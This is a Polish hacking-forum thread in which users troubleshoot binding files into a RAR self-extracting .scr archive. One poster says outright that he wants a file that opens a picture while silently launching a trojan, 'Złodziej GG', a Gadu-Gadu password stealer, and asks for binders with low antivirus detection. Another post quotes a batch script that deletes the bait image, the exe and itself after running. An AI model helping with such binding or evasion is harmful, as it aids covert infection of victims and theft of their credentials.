scr + jpg

jimy2x

Użytkownik
Dołączył
Wrzesień 19, 2007
Posty
10
nie wiem co robie nie tak, ale mi nadal wywala błąd, że nie może odnaleźć pliku :kreci: i wypakowuje pliki obok dopiero jak klikne na batch zostaje tylko fotka i nowy folder.exe
 

lisek160

Użytkownik
Dołączył
Marzec 21, 2007
Posty
175
u mnie wszystko śmiga jak należy
<
 

ignas_yo

Użytkownik
Dołączył
Lipiec 25, 2007
Posty
93
Originally posted by lisek160
:whoeva: :whoeva:

Kod:
echo off

del lol.jpg

del plik.bat

del lol.exe

za co ty masz te 14 razy "pomógł" :whoeva: :whoeva: :whoeva:

już chce mi sie śmiać jak w podpisach macie "wciśnij pomógł"
<
co wam o tym punkciku
<
Originally posted by KangurX
wkoncu sie ma to cos ^^ :whoeva:

przy otwieraniu pliku *.scr wyskakuje blad i dalej sie wypakuje all a jak klikne wypakowany plik.bat to usuwa zdjecie i samego siebie

patrzcie za co kochany kangurek dostał reputki..
posty typu:

Oooo no to fajnie ^^[/b]
to napisz jaka ;][/b]
Program wypas gratulacje dla autora ;][/b]
prosze o rehosta tego linku na megaupload albo na rapida bede bardzo wdzieczny bo link juz wygasl ;][/b]

@lisek160
śmiga ładnie, dzięki
<
 
K

KangurX

Gość
to nie za to, tylko goscie mnie nie znalezli to dali na byle jaki post ;]
(o ten rehost co prosilem to jest to) reszta to od czegos innego "pomógł"

Sam sie dziwie
 

Harpagan

Użytkownik
Dołączył
Maj 12, 2008
Posty
2
Witam!
<


Mam kapecke problem
<
Wiec postanowiłem odświeżyć topic
<
Mam nadzieje, że ktoś z forumowiczów będzie w stanie mi pomóc
<
Postępuje dokładnie z poradnikiem, ale gdy klikam na gotowy pliczek scr... Występuje błąd... Mianowicie nie można odnaleźć plików... Wszystkich trzech, które były pakowane SFX
<
Następnie pojawiają się i... To wszystko.. Nic się nie dzieje... Nie otwiera sie ani trojan (Złodziej GG v1.1) ani jpeg...
<

Chciałbym aby efektem końcowym mojej pracy był plik scr, który po otwarciu otworzy obrazek, a w tle bez zadnej informacji dla użytkownika otworzy sie trojan i porobi co trzeba
<
Proszę o pomoc! Oczywiscie w gre wchodzą inne bindery( oczywiscie o jak najmniejszej wykrywalnosci) chodzi tylko o to aby efekt końcowy był taki jak mnie interesuje
smile.gif
 

greg007

Użytkownik
Dołączył
Czerwiec 28, 2007
Posty
314
wiele się pisze na tym forum jak zbindować rarem, ale czemu nikt nie nakręci filmiku. Chętnie bym zrobił taki filmik ale jestem zalatany i nie mam czasu a wieczorem mówiąc szczerze jestem zbyt zmęczony. Jeden filmik by wystarczył i zniknęły by rozmowy na temat jak zbindować pliki rarem.
 

Harpagan

Użytkownik
Dołączył
Maj 12, 2008
Posty
2
Problem udało mi się rozwiązać samemu
<
Na szczęście...
<
Co do pomysłu z filmem świetna sprawa, samo bindowanie rarem nie jest czyms strasznym, ale początkujący ( w tym Ja
<
) może sprawić trudnośc kodowanie archiwum
<
 

EloKali

Użytkownik
Dołączył
Maj 21, 2008
Posty
1
<div class='quotetop'>CYTAT(Harpagan @ 15.05.2008, 12:31) <{POST_SNAPBACK}></div>
Problem udało mi się rozwiązać samemu
<
Na szczęście...
<
Co do pomysłu z filmem świetna sprawa, samo bindowanie rarem nie jest czyms strasznym, ale początkujący ( w tym Ja
<
) może sprawić trudnośc kodowanie archiwum
<
[/b]
Mam taki sam problem jak ty jesli bylbys na tyle mily i moglbys powiedziec co jest nie tak to bylbym wdzieczny
smile.gif
najpierw siedzialem 2h przy ostatnim punktcie bo nie chcialo mi sie skopiowac a teraz to aff z gory dziekuje
KALI~
 

gregoryfx

Użytkownik
Dołączył
Kwiecień 30, 2009
Posty
3
Witam, odświeżę post, może ktoś mi odpiszę
<


Wszystko robię jak należy, ale przy wypakowywaniu, piszę że nie może znaleść pliku i tak 3 razy czyli żadnego nie może znaleść i wyskakują trzy ikonki jak przed pakowaniem
<
. Nie mam pojęcia co robię źle.

Bardzo proszę o pomoc, pozdrawiam.
 

Yaasiu

Użytkownik
Dołączył
Kwiecień 18, 2009
Posty
1
<div class='quotetop'>CYTAT(gregoryfx @ 2.05.2009, 20:40) <{POST_SNAPBACK}></div>
Witam, odświeżę post, może ktoś mi odpiszę
<


Wszystko robię jak należy, ale przy wypakowywaniu, piszę że nie może znaleść pliku i tak 3 razy czyli żadnego nie może znaleść i wyskakują trzy ikonki jak przed pakowaniem
<
. Nie mam pojęcia co robię źle.

Bardzo proszę o pomoc, pozdrawiam.[/b]

Mam ten sam problem, jak to rozwiązać ???
 

kanar123

Użytkownik
Dołączył
Marzec 27, 2008
Posty
451
Kilka razy zdarzyło się że gdy wysyłałem konfigurator keya jakiemuś klientowi to pliku albo nie było albo się generował w folderze systemowym....
 

michael146

Użytkownik
Dołączył
Marzec 4, 2010
Posty
2
A ja mam problem taki sam jak już kilka innych osób miało. Robię dokładnie według instrukcji, ale jak odpalam plik SFX czy SCR to wyskakuje błąd, że nie znaleziono pliku blablabla.

Czy tam w komentarzu nie trzeba jeszcze dopisać czegoś wstylu PATH?

Z góry dzięki za pomoc.

Pozdrawiam.
 

michael146

Użytkownik
Dołączył
Marzec 4, 2010
Posty
2
Nie jest dla mnie problemem zmiana rozszerzenia. Tylko chodzi o to, że plik nie działa w innym folderze niż go utworzyłem.
 
Do góry Bottom